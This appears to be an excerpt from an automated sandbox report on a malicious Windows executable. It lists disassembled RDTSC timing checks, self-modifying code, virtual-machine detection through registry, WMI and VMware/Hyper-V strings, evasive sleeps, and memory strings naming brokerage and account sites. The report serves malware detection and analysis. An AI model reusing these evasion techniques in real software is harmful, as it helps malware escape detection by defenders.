                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110084 second address: 5110097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110097 second address: 51100A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51100A8 second address: 51100B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F5949Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51100B8 second address: 5110151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 2Ch 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F05F0F49764h 0x00000015 sbb ah, FFFFFFA8h 0x00000018 jmp 00007F05F0F4975Bh 0x0000001d popfd 0x0000001e mov eax, 5F53919Fh 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F05F0F49760h 0x0000002c sbb al, 00000008h 0x0000002f jmp 00007F05F0F4975Bh 0x00000034 popfd 0x00000035 push ecx 0x00000036 jmp 00007F05F0F4975Fh 0x0000003b pop ecx 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 pushfd 0x00000042 jmp 00007F05F0F49762h 0x00000047 sub ch, FFFFFF98h 0x0000004a jmp 00007F05F0F4975Bh 0x0000004f popfd 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110151 second address: 5110173 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, 6074066Bh 0x0000000b popad 0x0000000c xchg eax, ebx 0x0000000d jmp 00007F05F0F5949Eh 0x00000012 xchg eax, edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110173 second address: 5110179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110179 second address: 51101AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F05F0F594A2h 0x00000009 and cl, 00000058h 0x0000000c jmp 00007F05F0F5949Bh 0x00000011 popfd 0x00000012 push esi 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51101AA second address: 51101AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51101AE second address: 51101B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51101FD second address: 5110201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110201 second address: 5110207 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110207 second address: 511029C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edi, 2439C624h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, 00000000h 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F05F0F49766h 0x00000019 sbb ah, FFFFFFD8h 0x0000001c jmp 00007F05F0F4975Bh 0x00000021 popfd 0x00000022 mov ebx, ecx 0x00000024 popad 0x00000025 inc ebx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F05F0F49760h 0x0000002d sub ch, 00000038h 0x00000030 jmp 00007F05F0F4975Bh 0x00000035 popfd 0x00000036 mov dx, si 0x00000039 popad 0x0000003a test al, al 0x0000003c jmp 00007F05F0F49762h 0x00000041 je 00007F05F0F4996Eh 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F05F0F49767h 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 511029C second address: 5110302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 pushfd 0x00000011 jmp 00007F05F0F594A9h 0x00000016 add al, 00000046h 0x00000019 jmp 00007F05F0F594A1h 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [ebp-14h], edi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F05F0F5949Dh 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110302 second address: 5110308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 511035F second address: 5110363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110363 second address: 5110369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110369 second address: 5110380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110380 second address: 5110384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110384 second address: 511038A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51104A2 second address: 511055D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F05F0F49760h 0x0000000a sbb ax, 8A08h 0x0000000f jmp 00007F05F0F4975Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pushfd 0x00000017 jmp 00007F05F0F49768h 0x0000001c xor ah, 00000068h 0x0000001f jmp 00007F05F0F4975Bh 0x00000024 popfd 0x00000025 popad 0x00000026 lea eax, dword ptr [ebp-2Ch] 0x00000029 jmp 00007F05F0F49766h 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 mov bh, ch 0x00000032 mov edx, 496EC05Eh 0x00000037 popad 0x00000038 push eax 0x00000039 jmp 00007F05F0F49764h 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 mov dx, ax 0x00000043 jmp 00007F05F0F4975Ah 0x00000048 popad 0x00000049 nop 0x0000004a jmp 00007F05F0F49760h 0x0000004f push eax 0x00000050 pushad 0x00000051 mov edx, 4C7A0034h 0x00000056 mov si, bx 0x00000059 popad 0x0000005a nop 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 511055D second address: 5110561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110561 second address: 5110571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110571 second address: 5110583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F5949Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110632 second address: 5110637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110637 second address: 5110654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F594A9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110654 second address: 5110658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110658 second address: 5100C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F06618E748Bh 0x0000000e xor eax, eax 0x00000010 jmp 00007F05F0F32BCAh 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d xor ebx, ebx 0x0000001f cmp eax, 00000000h 0x00000022 je 00007F05F0F595F3h 0x00000028 call 00007F05F593758Fh 0x0000002d mov edi, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov si, 9253h 0x00000036 mov bx, cx 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5100C7F second address: 5100CBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49765h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F05F0F4975Eh 0x0000000f push eax 0x00000010 jmp 00007F05F0F4975Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5100CBA second address: 5100CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5100CBE second address: 5100CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5100CD9 second address: 5100D22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007F05F0F5949Bh 0x0000000c jmp 00007F05F0F594A3h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 jmp 00007F05F0F594A4h 0x0000001d mov ebx, esi 0x0000001f popad 0x00000020 xchg eax, ecx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5100D22 second address: 5100D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5100D26 second address: 5100D32 instructions: 0x00000000 rdtsc 0x00000002 mov si, BC35h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5100D32 second address: 5100D52 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F05F0F49765h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5100D52 second address: 5100D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5100D58 second address: 5100D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5100D5C second address: 5100D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5100D60 second address: 5100DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F05F0F49760h 0x00000011 pushfd 0x00000012 jmp 00007F05F0F49762h 0x00000017 jmp 00007F05F0F49765h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5100DA6 second address: 5100DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110A69 second address: 5110A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110A7E second address: 5110AAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, cx 0x0000000e mov di, ax 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov bx, 6042h 0x0000001b mov edi, 0F7C3E8Eh 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110AAB second address: 5110AE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AF459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F05F0F49767h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110AE3 second address: 5110AF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F05F0F5949Fh 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5110B3F second address: 5110B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 03BCB621h 0x0000000e jmp 00007F05F0F4975Fh 0x00000013 xor dword ptr [esp], 76122A09h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F05F0F49765h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 51209CA second address: 5120A35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F05F0F594A1h 0x00000009 jmp 00007F05F0F5949Bh 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F05F0F594A8h 0x00000015 sbb cl, 00000018h 0x00000018 jmp 00007F05F0F5949Bh 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F05F0F594A6h 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120A35 second address: 5120A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120A39 second address: 5120A3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120A3F second address: 5120A5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120A5E second address: 5120A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120A62 second address: 5120A7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120A7F second address: 5120AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F05F0F594A9h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120AB2 second address: 5120B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 5Ah 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c mov dh, cl 0x0000000e pushfd 0x0000000f jmp 00007F05F0F49767h 0x00000014 or si, 8ABEh 0x00000019 jmp 00007F05F0F49769h 0x0000001e popfd 0x0000001f popad 0x00000020 mov esi, dword ptr [ebp+0Ch] 0x00000023 pushad 0x00000024 movsx edx, cx 0x00000027 popad 0x00000028 test esi, esi 0x0000002a pushad 0x0000002b mov edx, eax 0x0000002d mov cl, 65h 0x0000002f popad 0x00000030 je 00007F06618B7005h 0x00000036 jmp 00007F05F0F4975Fh 0x0000003b cmp dword ptr [75AF459Ch], 05h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 mov si, dx 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120B2D second address: 5120B94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 mov di, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F06618DEDF5h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F05F0F5949Ch 0x00000018 jmp 00007F05F0F594A5h 0x0000001d popfd 0x0000001e call 00007F05F0F594A0h 0x00000023 pop edi 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 jmp 00007F05F0F5949Ch 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F05F0F5949Ch 0x00000034 push eax 0x00000035 pop edi 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120C2E second address: 5120C43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 5120C43 second address: 5120C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSpecial instruction interceptor: First address: 8E9B1B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSpecial instruction interceptor: First address: 8F0AC4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSpecial instruction interceptor: First address: 978580 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 1536Thread sleep time: -42021s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 4424Thread sleep time: -32016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 5404Thread sleep time: -450000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 2104Thread sleep time: -38019s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 3012Thread sleep time: -34017s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 1240Thread sleep time: -30015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeLast function: Thread delayed
                Source: Amcache.hve.5.drBinary or memory string: VMware
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: TmmiCE5Ulm.exe, TmmiCE5Ulm.exe, 00000000.00000002.2687870915.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2253010841.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2270285574.0000000001149000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334313230.0000000001149000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001149000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2231964807.0000000001154000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
